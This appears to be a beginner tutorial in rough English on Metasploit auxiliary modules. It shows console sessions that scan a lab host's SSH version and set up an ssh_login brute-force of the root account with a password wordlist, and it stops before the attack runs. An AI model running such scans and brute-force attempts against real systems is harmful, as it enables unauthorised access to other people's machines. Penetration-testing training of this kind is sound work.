Auxiliary on Metasploit

and simple exploit

Author : Abdullah Al Muzammi,.S.Kom
web blog : http://logsabdullah.blogspot.com
Email : muzammi06@gmail.com

IS2C-DOJO Jogjakarta Importan information as version, services, port scaner and etc a
application is inside a attacker to begin searching and finding vulner on application. The
metasploit is applicarion framework community provide every all vulner and pacth application.
And modul to metaspolit attain hundreds vulner are avaible exploit and auxilary, axilary modul
prepare as smtp fuzzer, scanner port, finger user, brucforce password, ssh version corrupt and
more.
We can show all kinds modul auxilary :
root@hakaje:/opt/framework/msf3/modules/auxiliary# ls -l
total 64
drwxr-xr-x 31 root root 4096 2011-12-23 16:52 admin
drwxr-xr-x 3 root root 4096 2011-12-06 09:19 analyze
drwxr-xr-x 3 root root 4096 2011-12-06 09:19 bnat
drwxr-xr-x 4 root root 4096 2011-08-17 00:11 client
drwxr-xr-x 3 root root 4096 2011-12-06 09:19 crawler
drwxr-xr-x 21 root root 4096 2011-12-06 09:19 dos
drwxr-xr-x 11 root root 4096 2011-12-23 16:53 fuzzers
drwxr-xr-x 3 root root 4096 2011-12-23 16:53 gather
drwxr-xr-x 4 root root 4096 2011-08-17 00:11 pdf
drwxr-xr-x 43 root root 4096 2011-12-06 09:19 scanner
drwxr-xr-x 5 root root 4096 2011-12-23 16:53 server
drwxr-xr-x 3 root root 4096 2011-08-17 00:11 sniffer
drwxr-xr-x 9 root root 4096 2011-08-17 00:11 spoof
drwxr-xr-x 4 root root 4096 2011-08-17 00:11 sqli
drwxr-xr-x 3 root root 4096 2011-12-06 09:19 voip
drwxr-xr-x 6 root root 4096 2011-12-06 09:19 vsploit
root@hakaje:/opt/framework/msf3/modules/auxiliary#
And now iam will explain about auxliary and simple exploit used modul auxilary. Modul
auxilary have most varian as like we show above list modul. Now i will shown are below how to
know version ssh to other computer as the victim.

msf > use auxiliary/scanner/ssh/ssh_version

msf auxiliary(ssh_version) > show options
Module options:
Name Current Setting Required Description
---- --------------- -------- ----------RHOSTS yes The target address range or CIDR identifier
RPORT 22 yes The target port
THREADS 1 yes The number of concurrent threads
TIMEOUT 30 yes Timeout for the SSH probe
msf auxiliary(ssh_version) > set RHOSTS 10.10.11.2
RHOSTS => 10.10.11.2
semsf auxiliary(ssh_version) > set THREADS 5
THREADS => 5
msf auxiliary(ssh_version) > show options
Module options:
Name Current Setting Required Description
---- --------------- -------- ----------RHOSTS 10.10.11.2 yes The target address range or CIDR identifier
RPORT 22 yes The target port
THREADS 5 yes The number of concurrent threads
TIMEOUT 30 yes Timeout for the SSH probe
msf auxiliary(ssh_version) > exploit
[*] 10.10.11.2:22, SSH server version: SSH-2.0-OpenSSH_5.3p1 Debian3ubuntu6
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
I will explain mind above simple exploit, IP target 10.10.11.2 are used sistem operation linuk
have service ssh on the sistem, and we would know version service ssh. Modul auxilary provide
scanner to know ssh_version, as like above example we have done with quick to know version
ssh and be search and know vulner this service to exploitdb.
Other simple how to uses modul auxilary to brucforce passwowrd ssh_login, We have modul
auxilary scaner to bruteforce password ssh login.

And we follow command as show are below :

msf auxiliary(ssh_login) > set RHOSTS 10.10.11.2
RHOSTS => 10.10.11.2
msf auxiliary(ssh_login) > set PASS_FILE
/tmp/darkc0de.lst
PASS_FILE => /tmp/darkc0de.lst
msf auxiliary(ssh_login) > set USERNAME root
USERNAME => root
msf auxiliary(ssh_login) > show options

And the finish we just wait a long time minute to proses bruteforce password ssh login with type
command exploit: